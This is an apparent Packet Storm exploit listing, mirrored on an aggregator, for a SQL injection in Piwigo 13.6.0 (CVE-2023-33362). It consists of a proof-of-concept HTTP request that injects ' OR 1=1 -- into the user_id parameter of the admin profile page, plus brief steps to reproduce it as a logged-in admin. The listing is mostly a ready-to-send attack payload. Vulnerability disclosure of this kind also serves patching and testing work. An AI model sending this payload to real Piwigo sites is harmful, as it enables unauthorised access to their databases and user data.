Share
## https://sploitus.com/exploit?id=PACKETSTORM:212371
# Exploit Title: Piwigo 13.6.0 - SQL Injection
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage:  https://github.com/Piwigo/Piwigo
    # Software Link: https://github.com/Piwigo/Piwigo
    # Version: 13.6.0 
    # Tested on: Windows
    # CVE : CVE-2023-33362
    
    
    Proof Of Concept:
    GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
    Host: piwigo
    
    Steps to Reproduce
    Login as an admin user.
    Send the request.
    Observe the result